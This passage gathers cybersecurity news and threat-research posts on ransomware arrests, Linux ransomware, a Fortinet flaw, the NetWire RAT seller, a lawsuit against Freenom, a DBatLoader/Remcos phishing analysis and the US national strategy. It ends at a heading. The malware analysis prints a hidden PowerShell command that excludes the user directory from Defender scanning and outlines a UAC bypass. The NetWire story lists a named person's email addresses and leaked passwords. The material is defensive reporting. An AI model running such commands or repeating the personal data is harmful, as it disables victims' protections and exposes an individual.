The Good, the Bad and the Ugly in Cybersecurity – Week 10

The Good

Prolific ransomware gang, DoppelPaymer (aka Grief), took a major hit this week as a number of their core members were arrested in Germany and Ukraine. In a joint operation conducted by Europol, the FBI, and the Dutch police force, two individuals have been taken into custody following multiple raids in both countries. IT experts and investigators are currently examining all seized electronic devices for forensic evidence and crypto tracing. In their statement, Europol stated that data from the resulting analysis is expected to trigger investigations in related cases.

Russian-linked DoppelPaymer has cost enterprises millions over the years. Operating as a Ransomware-as-a-Service (RaaS), they often leverage Emotet and Drydex malware variants to launch high profile, double extortion attacks focused on healthcare, government, and education sectors. In 2020, the gang crashed the operational systems of a hospital in Düsseldorf, causing critical delays in emergency treatments. The resulting death of one patient is often referred to as the first possible case of indirect casualty due to cyberattack. Past victims of the gang include SpaceX, NASA, Kia Motors, Compal, and Foxconn.

The DoppelPaymer sting operation is ongoing and authorities have issued arrest warrants for three more principal members who are still at large. Three suspects, Igor Olegovich Turashev, Irina Zemlyanikina, and Igor Garshin, are all wanted on charges including extortion, computer sabotage, spying, data encryption, and the administration of DoppelPaymer’s IT infrastructure, internal chats, and leak sites.

This operation is the latest in a global effort to crackdown on prominent ransomware syndicates. While collaboration between international authorities make impactful progress on dismantling cybercriminal networks, police urge organizations to continue reporting attacks immediately and implementing proactive measures against ever-rising ransomware attacks.

The Bad

IceFire ransomware operators have launched a new dedicated encryptor to actively target Linux systems. Reported this week by SentinelLabs, the ransomware gang recently targeted several media and entertainment enterprises across the world, encrypting their systems with the novel malware variant.

In this recent string of breaches, IceFire was observed exploiting a deserialization vulnerability tracked as CVE-2022-47986 (CVSS score 9.8) within IBM’s Aspera Faspex product (4.42 Patch Level 1) to deploy ransomware payloads. IceFire operators leveraged this flaw to execute arbitrary code on the infected system by sending a specially crafted obsolete API call. Upon execution, the IceFire ransomware works by encrypting files and adding the iFire extension to the name before deleting itself and removing the binary to wipe its own tracks.

Linux version of IceFire ransom note

SentinelLabs researchers explained that, in comparison to Windows, attackers have more difficulty deploying ransomware within Linux servers, especially at scale. To overcome this, attackers are increasingly turning to exploiting vulnerabilities within applications. Shodan, at the time of this publication, currently shows 158 Aspera Faspex servers exposed online mostly in the United States and China.

The shift from targeting Windows to Linux systems is a strategic one that is gaining traction across the greater cyberthreat landscape. Ransomware groups such as Cl0p, Hive, LockBit, HelloKitty, BlackMatter, RansomEXX, and AvosLocker have also made this move, seemingly to match global enterprises who have transitioned to Linux-powered virtual machines in the past few years. Researchers at SentinelLabs note that the recent evolution for IceFire is a clear indication that this trend will continue to grow in popularity throughout the rest of 2023.

The Ugly

A security advisory published by Fortinet this week disclosed a critical buffer underflow vulnerability impacting the company’s FortiOS and FortiProxy products. Tracked as CVE-2023-25610 (CVSS score 9.3), the vulnerability allows an unauthenticated attacker to execute arbitrary code or launch a denial of service (DoS) attack on the GUI of vulnerable devices.

This type of vulnerability is the result of programs trying to read more data from a memory buffer than what is available. In this scenario, the program must access adjacent memory locations that may lead to crashes and data loss. Buffer underflow vulnerabilities are most often leveraged by attackers for remote code execution (RCE) and DoS attacks. Fortinet strongly urges its users to deploy the security updates immediately. As a temporary workaround, users may also choose to disable access to the HTTP/HTTPS administrative interface or limit the IP addresses that have access to the interface.

Though Fortinet notes that it is not aware of any instance of exploitation of CVE-2023-25610 in the wild, this flaw closely follows on the heels of two other critical RCE flaws that impacted the company’s FortiNAC and FortiWeb products. Just four days after fixes were published for the pair of RCE flaws, a working proof-of-concept was made public resulting in immediate exploitation in the wild. Security teams are reminded that opportunistic attackers continuously sweep for vulnerabilities that allow them to gain initial access with as little work as possible. Critical-level vulnerabilities, particularly those that do not require authentication, are highly attractive to attackers and should be patched as a priority.

Who’s Behind the NetWire Remote Access Trojan?

A Croatian national has been arrested for allegedly operating NetWire, a Remote Access Trojan (RAT) marketed on cybercrime forums since 2012 as a stealthy way to spy on infected systems and siphon passwords. The arrest coincided with a seizure of the NetWire sales website by the U.S. Federal Bureau of Investigation (FBI). While the defendant in this case hasn’t yet been named publicly, the NetWire website has been leaking information about the likely true identity and location of its owner for the past 11 years.

Typically installed by booby-trapped Microsoft Office documents and distributed via email, NetWire is a multi-platform threat that is capable of targeting not only Microsoft Windows machines but also Android, Linux and Mac systems.

NetWire’s reliability and relatively low cost ($80-$140 depending on features) has made it an extremely popular RAT on the cybercrime forums for years, and NetWire infections consistently rank among the top 10 most active RATs in use.

NetWire has been sold openly on the same website since 2012: worldwiredlabs[.]com. That website now features a seizure notice from the U.S. Department of Justice, which says the domain was taken as part of “a coordinated law enforcement action taken against the NetWire Remote Access Trojan.”

“As part of this week’s law enforcement action, authorities in Croatia on Tuesday arrested a Croatian national who allegedly was the administrator of the website,” reads a statement by the U.S. Department of Justice today. “This defendant will be prosecuted by Croatian authorities. Additionally, law enforcement in Switzerland on Tuesday seized the computer server hosting the NetWire RAT infrastructure.”

Neither the DOJ’s statement nor a press release on the operation published by Croatian authorities mentioned the name of the accused. But it’s fairly remarkable that it has taken so long for authorities in the United States and elsewhere to move against NetWire and its alleged proprietor, given that the RAT’s author apparently did very little to hide his real-life identity.

The WorldWiredLabs website first came online in February 2012 using a dedicated host with no other domains. The site’s true WHOIS registration records have always been hidden by privacy protection services, but there are plenty of clues in historical Domain Name System (DNS) records for WorldWiredLabs that point in the same direction.

In October 2012, the WorldWiredLabs domain moved to another dedicated server at the Internet address 198.91.90.7, which was home to just one other domain: printschoolmedia[.]org, also registered in 2012.

According to DomainTools.com, printschoolmedia[.]org was registered to a Mario Zanko in Zapresic, Croatia, and to the email address zankomario@gmail.com. DomainTools further shows this email address was used to register one other domain in 2012: wwlabshosting[.]com, also registered to Mario Zanko from Croatia.

A review of DNS records for both printschoolmedia[.]org and wwlabshosting[.]com shows that while these domains were online they both used the DNS name server ns1.worldwiredlabs[.]com. No other domains have been recorded using that same name server.

The WorldWiredLabs website, in 2013. Source: Archive.org.

DNS records for worldwiredlabs[.]com also show the site forwarded incoming email to the address tommaloney@ruggedinbox.com. Constella Intelligence, a service that indexes information exposed by public database leaks, shows this email address was used to register an account at the clothing retailer romwe.com, using the password “123456xx.”

Running a reverse search on this password in Constella Intelligence shows there are more than 450 email addresses known to have used this credential, and two of those are zankomario@gmail.com and zankomario@yahoo.com.

A search on zankomario@gmail.com in Skype returns three results, including the account name “Netwire” and the username “Dugidox,” and another for a Mario Zanko (username zanko.mario).

Dugidox corresponds to the hacker handle most frequently associated with NetWire sales and support discussion threads on multiple cybercrime forums over the years.

Constella ties dugidox@gmail.com to a number of website registrations, including the Dugidox handle on BlackHatWorld and HackForums, and to IP addresses in Croatia for both. Constella also shows the email address zankomario@gmail.com used the password “dugidox2407.”

In 2010, someone using the email address dugidox@gmail.com registered the domain dugidox[.]com. The WHOIS registration records for that domain list a “Senela Eanko” as the registrant, but the address used was the same street address in Zapresic that appears in the WHOIS records for printschoolmedia[.]org, which is registered in Mr. Zanco’s name.

Prior to the demise of Google+, the email address dugidox@gmail.com mapped to an account with the nickname “Netwire wwl.” The dugidox email also was tied to a Facebook account (mario.zanko3), which featured check-ins and photos from various places in Croatia.

That Facebook profile is no longer active, but back in January 2017, the administrator of WorldWiredLabs posted that he was considering adding certain Android mobile functionality to his service. Three days after that, the Mario.Zank3 profile posted a photo saying he was selected for an Android instruction course — with his dugidox email in the photo, naturally.

Incorporation records from the U.K.’s Companies House show that in 2017 Mr. Zanko became an officer in a company called Godbex Solutions LTD. A Youtube video invoking this corporate name describes Godbex as a “next generation platform” for exchanging gold and cryptocurrencies.

The U.K. Companies House records show Godbex was dissolved in 2020. It also says Mr. Zanko was born in July 1983, and lists his occupation as “electrical engineer.”

Mr. Zanko did not respond to multiple requests for comment.

Five Ways to #EmbraceEquity in the Workplace

Today is International Women’s Day and the theme for this year is #EmbraceEquity. Even with our progress in gender equality, women are still grossly underrepresented in the workplace – only 1 in 4 C-suite executives is a woman, and only 1 in 20 is a woman of color.

In the tech industry, the story is similar. Roughly 25% of all tech workers are women and the imbalance dips to 16% female representation in software engineering. As we work to close the gap, women’s representation in tech new hires has increased slightly to 31%.

The recent spate of tech layoffs is not helping progress. Women account for 46% of those let go; a statistic that exponentially shrinks an already underrepresented group. Transformative change will take mass action from all and call for a seismic shift in the way we #EmbraceEquity in the workplace.

I am encouraged that many leaders are coming forward to find a path where they foster diverse workplaces without compromising on the quality of talent or impact. They realize that a more diverse, equitable and inclusive company is a more successful one. Women bring amazing talents, skill sets, experiences, and perspectives that are critical to success.

Here are five ways to #EmbraceEquity in the workplace and close the gender gap to ensure women have the same access to successful, fulfilling careers in tech and have game-changing impact on their workplaces and communities.

1. Shine the Spotlight | Diversify Your Talent Pipeline

More often than not, most leaders today want to take action, but first we need to sincerely address the common refrain of “we just don’t have diverse talent in our pipeline!”

This needs attention at all levels. A strong university recruiting and internship program can have a big impact in diversifying your pipeline, so invest in that. These can and will be your leaders for tomorrow and dramatically influence your talent mix so prioritize these programs in your operating plans. Growing your own talent will always be more effective on impact and your operating margin than poaching from your competition.

Next, closing the gender gap starts with fair and equitable hiring practices and tracking for action against those. Having qualified female representation both in the candidate slate and interview panel is paramount with more than one qualified woman candidate advancing to the final interview round. It’s also critical to have pipeline reporting where applicable by law to know just how many women are being considered – you can’t grow what you don’t know!

Most importantly, creating a culture where all voices are heard is central to have people from all genders, representations and backgrounds succeed. Succession planning, internal promotions, and a commitment to career pathing are important pathways to growing and retaining top talent on your bench. If you don’t create opportunities for your high-performing females one thing is for certain – your competitors will.

2. Amplify the Power of Community

The power of community invigorates and blazes trails for many across your organization to succeed. Create several platforms for women and their allies to connect with each other to share their journeys and stories and learn from mentorship opportunities. Employee-led women’s networks can foster an inclusive workplace and are critical catalysts for positive change, giving people a great way to network, learn, and celebrate what makes us different and unique. Leadership advocacy is crucial to success within a women’s network and for ensuring that the issues that matter most to gender equity are heard at the highest levels.

Look for established experts in the space to connect and collaborate with such as Women in Cybersecurity, Girls Who Code, and AnitaB.org. Sponsoring women of all levels to get engaged with non-profit advocacy groups is a great way to encourage networking while casting a wide net for new female talent.

3. Drive Accountability with Insights & Data

‘Diversity and Inclusion’ is not an initiative; it’s a way of operating. Just as we measure operational efficiency, sales success, and profit margin, if you want to truly #EmbraceEquity, you have to set reasonable goals, create meaningful KPIs, and consistently monitor progress. Statistics like overall gender percentages, percentage of female promotions, diversity mix of both internal and external talent pipelines and percentage of women in leadership positions are key metrics to measure improvement.

Just as important as measuring progress is halting any actions that could stop it. Swift action must be taken on any discriminatory behavior in the workplace.

4. Foster Equity Through Learning

A learning culture is a more equitable one. To fully #EmbraceEquity, there must be a defined DEI learning journey for all employees at all levels. It starts with leadership training and coaching and includes other key concepts like unconscious bias, microaggressions, sexual harassment, and bystander intervention.

Taking the time to listen and learn from the experiences of others might be the most insightful learning of all. Creating authentic mentoring relationships for women can increase confidence and accelerate development. Best part of the equation? Both sides of the relationship are better for the experience!

5. Make Space to Hear All Voices

When women feel they are being heard and that their voice matters, they use it more. Helping others find their voice can be as simple as asking for an opinion in a meeting or inviting someone to collaborate on a project. Seeking the power of female voices will not only improve your process, it will improve your product.

Inviting women of all levels and functions to make an impact is a win-win on all sides of the equation. You are instilling confidence, unlocking productivity, and building your leadership bench. Making a commitment to #EmbraceEquity is not just something we are doing to improve the workplace – it’s a call to action to improve the world!

About the Author

Divya Ghatak is a top tech talent executive with over 20 years of global experience. As the Chief People Officer at SentinelOne, Divya is a transformative leader who drives a people-first experience and fosters a values-driven culture. Her true passion is equity in the workplace and continuing to close the gender gap in tech for the next generation, including her lovely daughter, Ananya.

Sued by Meta, Freenom Halts Domain Registrations

The domain name registrar Freenom, whose free domain names have long been a draw for spammers and phishers, has stopped allowing new domain name registrations. The move comes just days after the Dutch registrar was sued by Meta, which alleges the company ignores abuse complaints about phishing websites while monetizing traffic to those abusive domains.

Freenom’s website features a message saying it is not currently allowing new registrations.

Freenom is the domain name registry service provider for five so-called “country code top level domains” (ccTLDs), including .cf for the Central African Republic; .ga for Gabon; .gq for Equatorial Guinea; .ml for Mali; and .tk for Tokelau.

Freenom has always waived the registration fees for domains in these country-code domains, presumably as a way to encourage users to pay for related services, such as registering a .com or .net domain, for which Freenom does charge a fee.

On March 3, 2023, social media giant Meta sued Freenom in a Northern California court, alleging cybersquatting violations and trademark infringement. The lawsuit also seeks information about the identities of 20 different “John Does” — Freenom customers that Meta says have been particularly active in phishing attacks against Facebook, Instagram, and WhatsApp users.

The lawsuit points to a 2021 study (PDF) on the abuse of domains conducted by Interisle Consulting Group, which discovered that those ccTLDs operated by Freenom made up five of the Top Ten TLDs most abused by phishers.

“The five ccTLDs to which Freenom provides its services are the TLDs of choice for cybercriminals because Freenom provides free domain name registration services and shields its customers’ identity, even after being presented with evidence that the domain names are being used for illegal purposes,” the complaint charges. “Even after receiving notices of infringement or phishing by its customers, Freenom continues to license new infringing domain names to those same customers.”

Meta further alleges that “Freenom has repeatedly failed to take appropriate steps to investigate and respond appropriately to reports of abuse,” and that it monetizes the traffic from infringing domains by reselling them and by adding “parking pages” that redirect visitors to other commercial websites, websites with pornographic content, and websites used for malicious activity like phishing.

Freenom has not yet responded to requests for comment. But attempts to register a domain through the company’s website as of publication time generated an error message that reads:

“Because of technical issues the Freenom application for new registrations is temporarily out-of-order. Please accept our apologies for the inconvenience. We are working on a solution and hope to resume operations shortly. Thank you for your understanding.”

Image: Interisle Consulting Group, Phishing Landscape 2021, Sept. 2021.

Although Freenom is based in The Netherlands, some of its other sister companies named as defendants in the lawsuit are incorporated in the United States.

Meta initially filed this lawsuit in December 2022, but it asked the court to seal the case, which would have restricted public access to court documents in the dispute. That request was denied, and Meta amended and re-filed the lawsuit last week.

According to Meta, this isn’t just a case of another domain name registrar ignoring abuse complaints because it’s bad for business. The lawsuit alleges that the owners of Freenom “are part of a web of companies created to facilitate cybersquatting, all for the benefit of Freenom.”

“On information and belief, one or more of the ccTLD Service Providers, ID Shield, Yoursafe, Freedom Registry, Fintag, Cervesia, VTL, Joost Zuurbier Management Services B.V., and Doe Defendants were created to hide assets, ensure unlawful activity including cybersquatting and phishing goes undetected, and to further the goals of Freenom,” Meta charged.

It remains unclear why Freenom has stopped allowing domain registration, but it could be that the company was recently the subject of some kind of disciplinary action by the Internet Corporation for Assigned Names and Numbers (ICANN), the nonprofit entity which oversees the domain registrars.

In June 2015, ICANN suspended Freenom’s ability to create new domain names or initiate inbound transfers of domain names for 90 days. According to Meta, the suspension was premised on ICANN’s determination that Freenom “has engaged in a pattern and practice of trafficking in or use of domain names identical or confusingly similar to a trademark or service mark of a third party in which the Registered Name Holder has no rights or legitimate interest.”

ICANN has not yet responded to requests for comment.

A copy of the amended complaint against Freenom, et. al, is available here (PDF).

DBatLoader and Remcos RAT Sweep Eastern Europe

SentinelOne has been observing phishing campaigns that distribute the Remcos RAT using the DBatLoader malware loader to target predominantly Eastern European institutions and businesses. In this blog post, we summarize our observations on these campaigns to equip defenders with the information they need to protect against this threat.

DBatLoader is characterized by the abuse of public Cloud infrastructure to host its malware staging component. The feature-rich RAT Remcos is actively used by threat actors with cybercriminal and espionage motivations. Threat actors typically distribute the RAT through phishing emails and stage it on systems using a variety of forms and methods.

Examples include the use of the TrickGate loader stored in archive files, malicious ISO images, and URLs to VBScript scripts embedded in pictures. Further, the Ukrainian CERT has recently issued reports on Remcos RAT phishing campaigns targeting Ukrainian state institutions for espionage purposes using password-protected archives as email attachments.

This report compliments the available information about recent phishing campaigns that distribute Remcos by highlighting the way in which DBatLoader stages the RAT on infected systems.

DBatLoader and Remcos Phishing Emails

The phishing emails distributing DBatLoader and Remcos have attachments in the form of tar.lz archives that typically masquerade as financial documents, such as invoices or tender documentation. To make the emails look credible, we observed the threat actors using a variety of techniques.

From the recipient’s perspective, the phishing emails originate from institutions or business organizations related to the target such that sending an invoice would be realistic. The emails are typically sent to the sales departments of the targets or their main contact email addresses as disclosed online.

We observed emails sent from what seems to be compromised private email accounts and accounts from public email services that are also used by the targets and the legitimate institutions or organizations which are supposedly sending the email.

Many of the phishing emails we observed have been sent from email accounts with top-level domains of the same country as where the target is based. These emails typically do not contain any text accompanying the malicious attachment or contain text written in the language of the target’s country. In the cases where the threat actors are not masquerading the phishing emails as originating from an institution or business organization local to the target, the emails contain text written in English.

Example phishing email

DBatLoader Staging Remcos RAT

The tar.lz archives attached to phishing emails contain DBatLoader executables. These pack Remcos and usually masquerade as Microsoft Office, LibreOffice, or PDF documents using double extensions and/or application icons.

When a user decompresses the attachment and runs the executable within, DBatLoader downloads and executes an obfuscated second-stage payload data from a public Cloud location. We observed download links to Microsoft OneDrive and Google Drive sites (under the drive.google.com and onedrive.live.com domains) with varying lifetime spans, the longest of which was more than one month.

The Cloud file storage locations that were active while we investigated contained only the second-stage DBatLoader payload data and were registered to individuals. We have no knowledge at this point whether the threat actors have been using self-registered and/or compromised Microsoft OneDrive and Google Drive credentials to host DBatLoader payload.

The malware then creates and executes an initial Windows batch script in the %Public%Libraries directory. This script abuses a known method for bypassing Windows User Account Control that involves the creation of mock trusted directories, such as %SystemRoot%System32, by using trailing spaces. This enables the attackers to conduct elevated activities without alerting users.

An initial batch script

The script creates the mock %SystemRoot%System32 trusted directory by issuing requests directly to the file system – note the prepended ? to the directory names. It then copies into this directory a KDECO.bat batch script, the legitimate easinvoker.exe (Exchange ActiveSync Invoker) executable, and a malicious netutils.dll DLL file, which DBatLoader had previously dropped in the %Public%Libraries directory. The script then executes the easinvoker.exe copy and deletes the mock directory.

When it comes to the netutils.dll DLL, easinvoker.exe is susceptible to DLL hijacking enabling the execution of the malicious netutils.dll in its context. easinvoker.exe is an auto-elevated executable, meaning that Windows automatically elevates this process without issuing an UAC prompt if located in a trusted directory – the mock %SystemRoot%System32 directory ensures this criteria is fulfilled.

easinvoker.exe loads the malicious netutils.dll, which executes the KDECO.bat script.

netutils.dll executes KDECO.bat

As an anti-detection measure, KDECO.bat adds the C:Users directory to the Microsoft Defender exclusion list to exclude the directory from scanning.

powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:Users'"

DBatLoader establishes persistence across system reboots by copying itself in the %Public%Libraries directory and creating an autorun registry key under HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun. This key points to an Internet Shortcut file that executes the DBatLoader executable in %Public%Libraries, which in turn executes Remcos through process injection.

Example Internet Shortcut file

We observed a wide variety of Remcos configurations, most of which configured keylogging and screenshot theft capabilities as well as duckdns dynamic DNS domains for C2 purposes.

Example Remcos configuration

Recommendations for Users and Administrators

To reduce risk, users should remain alert against phishing attacks and avoid opening attachments from unknown sources. It is important to note that DBatLoader and Remcos are often disguised as financial documents, emphasizing caution when handling such files.

For administrators:

  • Stay vigilant against malicious network requests to public Cloud instances. The use of public Cloud infrastructure for hosting malware is an attempt to make network traffic for malware delivery look legitimate, making detection harder for defenders. This tactic is popular amongst cyber criminals and espionage threat actors, a recent example being the WIP 26 espionage activity reported by SentinelLabs and QGroup GmbH.
  • Monitor for suspicious file creation activities in the %Public%Library directory and process execution activities that involve filesystem paths with trailing spaces, especially Windows . The latter is a reliable indicator of malware attempting to bypass Windows UAC by abusing mock trusted directories, such as %SystemRoot%System32.
  • Consider configuring Windows UAC to Always notify, which will always alert users when a program attempts to make changes to your computers.

Conclusion

The Remcos RAT, which is distributed through phishing campaigns utilizing the DBatLoader malware loader, poses a significant threat to Eastern European organizations and enterprises. Remcos is known for its use in cybercriminal and espionage campaigns. Threat actors have used various methods, such as the TrickGate loader, malicious ISO images, and URLs embedded in pictures, to plant the RAT on systems. DBatLoader leverages public Cloud infrastructure to host its malware staging component. To protect against these attacks, administrators must remain attentive against phishing attempts, educate users to avoid opening attachments from unknown senders, and deploy advanced security measures such as XDR. Implementing XDR can provide comprehensive visibility across endpoints, cloud workloads, and network infrastructure, allowing organizations to detect and respond to threats quickly and effectively. By adopting these measures, institutions and businesses can lower their risk of falling victim to these attacks and safeguard their sensitive data.

The Good, the Bad and the Ugly in Cybersecurity – Week 9

The Good

In a first for the U.S., a coordinated, national cybersecurity strategy was unveiled this week as the government continues its campaign to get on top of a cybersecurity problem that has spiraled out of control in recent years.

The National Cybersecurity Strategy is an ambitious, five-pronged approach that seeks to defend critical infrastructure, disrupt threat actors, promote data privacy and security, invest in cyber resilience, and forge international partnerships to fight cyber threats.

The strategy comes as the latest response to the attacks on schools, healthcare, energy suppliers and food production outlets that have plagued the nation in recent years. Recognizing that nation-state espionage and supply chain attacks are also complex problems that need both investment and coordination between diverse entities, the government’s National Cybersecurity Strategy has itself been developed through consultation with both public and private sector companies and experts.

SentinelOne’s Juan Andres Guerrero-Saade, Senior Director of the company’s threat intelligence and research arm SentinelLabs, said that leaving security investments entirely up to the market had proven ineffective, and that the government’s plan was both timely and necessary. The strategy will help to reshape market dynamics to incentivize and reward security investment, he said.

Although the implementation details of the strategy remain to be seen, SentinelOne recognizes the importance of the approach and is committed to supporting it in the fight to secure and protect the digital landscape for all.

The Bad

Cryptojacking, it seems, is back in fashion. Cryptomining campaigns appeared to have waned after in-browser cryptojacking became more or less tapped out due to improved browser security, but campaigns to infect home, enterprise and now cloud hosts with stealthy resource-stealing malware have quietly been burrowing away in the dark.

This week, a new cryptojacking campaign targeting Redis database servers was brought to light. The campaign makes novel use of the popular file transfer service transfer.sh, a command line utility for sharing files over the internet. Many cloud-focused malware campaigns use shell scripts, and services like transfer.sh and pastebin are ideal for hosting and retrieving malicious payloads.

In this case, threat actors used the command line file transfer service to host scripts that dropped the XMRig cryptocurrency miner, terminated any competing miners, and installed the pnscan network scanner to discover other vulnerable Redis servers and spread the infection.

redis cryptominer
Source

The campaign follows on the heels of renewed activity by 8220 Gang, who also propagate XMRig to surreptitiously mine cryptocurrency on compromised enterprise cloud workloads, and the recent discovery of Honkbox, a novel XMRig cryptomining malware that uses I2P tunnels to hide its traffic, which has been quietly targeting macOS endpoints for over three years.

Aside from the increased costs due to the heavy use of electricity that cryptomining infections can cause, it’s also worth noting that in most cases, the miner is a separate stage payload from the dropper or infection vector. That means that while these campaigns may currently be focusing on stealing electricity to mine cryptocurrency, the threat actors could just as easily drop a different, more destructive or profitable payload should they wish. Securing those endpoints against any intrusion is the only safe way to operate.

The Ugly

More hard knocks for password manager LastPass this week after news broke of yet another hack in the wake of an earlier compromise. This time, in a highly-targeted attack, a decrypted LastPass vault was stolen from an employee, giving attackers access to a cloud-storage environment containing encryption keys for customer vault backups.

The attack, which took place between August and October last year, leveraged data stolen in the first attack even before LastPass had completed its initial mitigation.

In a statement, the company revealed that the threat actor targeted one of only four DevOps engineers who had access to decryption keys needed to access a LastPass cloud storage service. The employee’s home computer was infected with a keylogger that then captured the employee’s master password as it was entered after MFA authentication. The compromise was effected through exploiting a vulnerability in an unnamed “third-party media software package”. This afforded the attacker remote code execution capabilities and the opportunity to plant the keylogger.

The attack initially did not raise suspicions as the login behavior appeared indistinguishable from legitimate activity, but alerts from AWS flagged up anomalous behavior when the threat actor tried to use IAM roles to perform unauthorized activity.

Concerned LastPass users can consult the advisory on the company’s blog. For enterprises, the LastPass incident is a timely reminder that the cloud and the shift to work from home has changed the face of enterprise security. Endpoint security should be bolstered with cloud workload protection and identity threat detection to thwart threat actors who are increasingly looking at these surfaces as a means of compromise.

Highlights from the New U.S. Cybersecurity Strategy

The Biden administration today issued its vision for beefing up the nation’s collective cybersecurity posture, including calls for legislation establishing liability for software products and services that are sold with little regard for security. The White House’s new national cybersecurity strategy also envisions a more active role by cloud providers and the U.S. military in disrupting cybercriminal infrastructure, and it names China as the single biggest cyber threat to U.S. interests.

The strategy says the White House will work with Congress and the private sector to develop legislation that would prevent companies from disavowing responsibility for the security of their software products or services.

Coupled with this stick would be a carrot: An as-yet-undefined “safe harbor framework” that would lay out what these companies could do to demonstrate that they are making cybersecurity a central concern of their design and operations.

“Any such legislation should prevent manufacturers and software publishers with market power from fully disclaiming liability by contract, and establish higher standards of care for software in specific high-risk scenarios,” the strategy explains. “To begin to shape standards of care for secure software development, the Administration will drive the development of an adaptable safe harbor framework to shield from liability companies that securely develop and maintain their software products and services.”

Brian Fox, chief technology officer and founder of the software supply chain security firm Sonatype, called the software liability push a landmark moment for the industry.

“Market forces are leading to a race to the bottom in certain industries, while contract law allows software vendors of all kinds to shield themselves from liability,” Fox said. “Regulations for other industries went through a similar transformation, and we saw a positive result — there’s now an expectation of appropriate due care, and accountability for those who fail to comply. Establishing the concept of safe harbors allows the industry to mature incrementally, leveling up security best practices in order to retain a liability shield, versus calling for sweeping reform and unrealistic outcomes as previous regulatory attempts have.”

THE MOST ACTIVE, PERSISTENT THREAT

In 2012 (approximately three national cyber strategies ago), then director of the U.S. National Security Agency (NSA) Keith Alexander made headlines when he remarked that years of successful cyber espionage campaigns from Chinese state-sponsored hackers represented “the greatest transfer of wealth in history.”

The document released today says the People’s Republic of China (PRC) “now presents the broadest, most active, and most persistent threat to both government and private sector networks,” and says China is “the only country with both the intent to reshape the international order and, increasingly, the economic, diplomatic, military, and technological power to do so.”

Many of the U.S. government’s efforts to restrain China’s technology prowess involve ongoing initiatives like the CHIPS Act, a new law signed by President Biden last year that sets aside more than $50 billion to expand U.S.-based semiconductor manufacturing and research and to make the U.S. less dependent on foreign suppliers; the National Artificial Intelligence Initiative; and the National Strategy to Secure 5G.

As the maker of most consumer gizmos with a computer chip inside, China is also the source of an incredible number of low-cost Internet of Things (IoT) devices that are not only poorly secured, but are probably more accurately described as insecure by design.

The Biden administration said it would continue its previously announced plans to develop a system of labeling that could be applied to various IoT products and give consumers some idea of how secure the products may be. But it remains unclear how those labels might apply to products made by companies outside of the United States.

FIGHTING BADNESS IN THE CLOUD

One could convincingly make the case that the world has witnessed yet another historic transfer of wealth and trade secrets over the past decade — in the form of ransomware and data ransom attacks by Russia-based cybercriminal syndicates, as well as Russian intelligence agency operations like the U.S. government-wide Solar Winds compromise.

On the ransomware front, the White House strategy seems to focus heavily on building the capability to disrupt the digital infrastructure used by adversaries that are threatening vital U.S. cyber interests. The document points to the 2021 takedown of the Emotet botnet — a cybercrime machine that was heavily used by multiple Russian ransomware groups — as a model for this activity, but says those disruptive operations need to happen faster and more often.

To that end, the Biden administration says it will expand the capacity of the National Cyber Investigative Joint Task Force (NCIJTF), the primary federal agency for coordinating cyber threat investigations across law enforcement agencies, the intelligence community, and the Department of Defense.

“To increase the volume and speed of these integrated disruption campaigns, the Federal Government must further develop technological and organizational platforms that enable continuous, coordinated operations,” the strategy observes. “The NCIJTF will expand its capacity to coordinate takedown and disruption campaigns with greater speed, scale, and frequency. Similarly, DoD and the Intelligence Community are committed to bringing to bear their full range of complementary authorities to disruption campaigns.”

The strategy anticipates the U.S. government working more closely with cloud and other Internet infrastructure providers to quickly identify malicious use of U.S.-based infrastructure, share reports of malicious use with the government, and make it easier for victims to report abuse of these systems.

“Given the interest of the cybersecurity community and digital infrastructure owners and operators in continuing this approach, we must sustain and expand upon this model so that collaborative disruption operations can be carried out on a continuous basis,” the strategy argues. “Threat specific collaboration should take the form of nimble, temporary cells, comprised of a small number of trusted operators, hosted and supported by a relevant hub. Using virtual collaboration platforms, members of the cell would share information bidirectionally and work rapidly to disrupt adversaries.”

But here, again, there is a carrot-and-stick approach: The administration said it is taking steps to implement Executive Order (EO) 13984 –issued by the Trump administration in January 2021 — which requires cloud providers to verify the identity of foreign persons using their services.

“All service providers must make reasonable attempts to secure the use of their infrastructure against abuse or other criminal behavior,” the strategy states. “The Administration will prioritize adoption and enforcement of a risk-based approach to cybersecurity across Infrastructure-as-a-Service providers that addresses known methods and indicators of malicious activity including through implementation of EO 13984.”

Ted Schlein, founding partner of the cybersecurity venture capital firm Ballistic Ventures, said how this gets implemented will determine whether it can be effective.

“Adversaries know the NSA, which is the elite portion of the nation’s cyber defense, cannot monitor U.S.-based infrastructure, so they just use U.S.-based cloud infrastructure to perpetrate their attacks,” Schlein said. “We have to fix this. I believe some of this section is a bit pollyannaish, as it assumes a bad actor with a desire to do a bad thing will self-identify themselves, as the major recommendation here is around KYC (‘know your customer’).”

INSURING THE INSURERS

One brief but interesting section of the strategy titled “Explore a Federal Cyber Insurance Backdrop” contemplates the government’s liability and response to a too-big-to-fail scenario or “catastrophic cyber incident.”

“We will explore how the government can stabilize insurance markets against catastrophic risk to drive better cybersecurity practices and to provide market certainty when catastrophic events do occur,” the strategy reads.

When the Bush administration released the first U.S. national cybersecurity strategy 20 years ago after the 9/11 attacks, the popular term for that same scenario was a “digital Pearl Harbor,” and there was a great deal of talk then about how the cyber insurance market would soon help companies shore up their cybersecurity practices.

In the wake of countless ransomware intrusions, many companies now hold cybersecurity insurance to help cover the considerable costs of responding to such intrusions. Leaving aside the question of whether insurance coverage has helped companies improve security, what happens if every one of these companies has to make a claim at the same time?

The notion of a Digital Pearl Harbor incident struck many experts at the time as a hyperbolic justification for expanding the government’s digital surveillance capabilities, and an overstatement of the capabilities of our adversaries. But back in 2003, most of the world’s companies didn’t host their entire business in the cloud.

Today, nobody questions the capabilities, goals and outcomes of dozens of nation-state level cyber adversaries. And these days, a catastrophic cyber incident could be little more than an extended, simultaneous outage at multiple cloud providers.

The full national cybersecurity strategy is available from the White House website (PDF).

The National Cybersecurity Strategy | How the US Government Plans to Protect America

On Thursday, the Biden administration released its long-awaited national cybersecurity strategy, outlining how the US government should approach cybercrime, its own defenses, and the private sector’s responsibility for security over the next several years. The White House says an updated strategy, cohesive across federal agencies, is necessary due to the growing importance of digital services, spurred in part by stay-at-home orders during the Covid-19 pandemic.

At the same time, malicious cyber activity has evolved from a criminal nuisance to a threat to national security, conducted by criminal gangs and nation-states alike. In this post, we explore the details of this plan and how it will protect America’s digital landscape.

Background

